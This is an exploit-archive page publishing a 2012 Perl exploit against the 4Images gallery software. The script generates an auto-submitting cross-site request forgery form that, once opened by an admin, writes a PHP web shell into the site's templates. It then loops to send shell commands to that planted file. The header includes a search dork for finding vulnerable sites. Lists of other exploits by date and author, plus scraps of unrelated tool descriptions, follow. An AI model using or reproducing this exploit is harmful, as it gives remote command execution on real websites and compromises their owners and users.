Menu

Search for hundreds of thousands of exploits

"4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection"

Author

Exploit author

Or4nG.M4N

Platform

Exploit platform

php

Release date

Exploit published date

2012-01-30

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/perl
########################################################################
# Title    : 4images 1.7.6 > 9 Csrf inject php code
# Author   : Or4nG.M4n
# Version  : 1.7.6 > 9
# Homepage : http://www.4homepages.de/
# Dork     : "Powered by 4images"
# video    : http://youtu.be/NYF_zC9hH54
# Thnks~#+----------------------------------+
#        |    xSs m4n   i-Hmx   h311c0d3    |.sp. abo.B4sil
#        |   HcJ Cyb3r ahwak20o0 sa^Dev!L   |.sp. r00ts3c
#        +----------------------------------+
#                       4images 1.7.6 > 9 Csrf inject php code
# vuln : template.php
use LWP::UserAgent;
use LWP::Simple;
system("cls");
print
"
+----------------------------------------+\n
| 4images 1.7.6 > 9 csrf inject php code |\n
|   Or4nG.M4n  : priv8te\@hotmail.com    |\n
+----------------------------------------+\n
Loading ...\n
";
sleep(3);
print "http://tragt & path #";
$h = <STDIN>;
chomp $h;
$html = '<form action="'.$h.'/admin/templates.php" name="csrf" method="post">
<input type="hidden" name="action" value="savetemplate">
<textarea name="content" cols="0" rows="0" >
<?php
$cmd = $_GET["cmd"];
print "\n__Code__\n";
@system($cmd);
print "\n__Code__\n";
?>
&lt;/textarea&gt;
<input type="hidden" name="template_file_name" value="inject.php">
<input type="hidden" name="template_folder" value="default">
<script>document.csrf.submit();</script>
</form>';
sleep(2);
print "Createing ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "Createing Done .. \n";
sleep(2);
print "Now give csrf.htm to admin or useing iframe code\n";
sleep(1);
print "\n if you done hit any key to continue";
$continue = <>;
for($ops=0;$ops<15;$ops++)
{
print "
Command# ";
$execut =<STDIN>;
chomp($execut);
$ex = $h."/templates/default/inject.php?cmd=".$execut;
my $content = get $ex;
while($content =~ m{__Code__(.*?)__code__(.*)}g){
print "\n [+]Executing\n\n";
}
print  $content;
}
# The End
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-01-16 "Online Book Store 1.0 - Arbitrary File Upload" webapps php Or4nG.M4N
2012-01-30 "4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection" webapps php Or4nG.M4N
2012-01-22 "MiniCMS 1.0/2.0 - PHP Code Injection" webapps php Or4nG.M4N
2012-01-21 "PHP iReport 1.0 - Remote Html Code Injection" webapps php Or4nG.M4N
2012-01-21 "iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)" webapps php Or4nG.M4N
2012-01-16 "PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities" webapps php Or4nG.M4N
2012-01-10 "Pragyan CMS 3.0 - Remote File Disclosure" webapps php Or4nG.M4N
2011-11-03 "Jara 1.6 - Multiple Vulnerabilities" webapps php Or4nG.M4N
2011-07-09 "Portix-CMS 1.5.0. rc5 - Local File Inclusion" webapps php Or4nG.M4N
2011-01-15 "ViArt Shop 4.0.5 - Cross-Site Request Forgery" webapps php Or4nG.M4N
2010-11-19 "Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)" webapps php Or4nG.M4N
2010-11-19 "PHPGallery 1.1.0 - Cross-Site Request Forgery" webapps php Or4nG.M4N
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.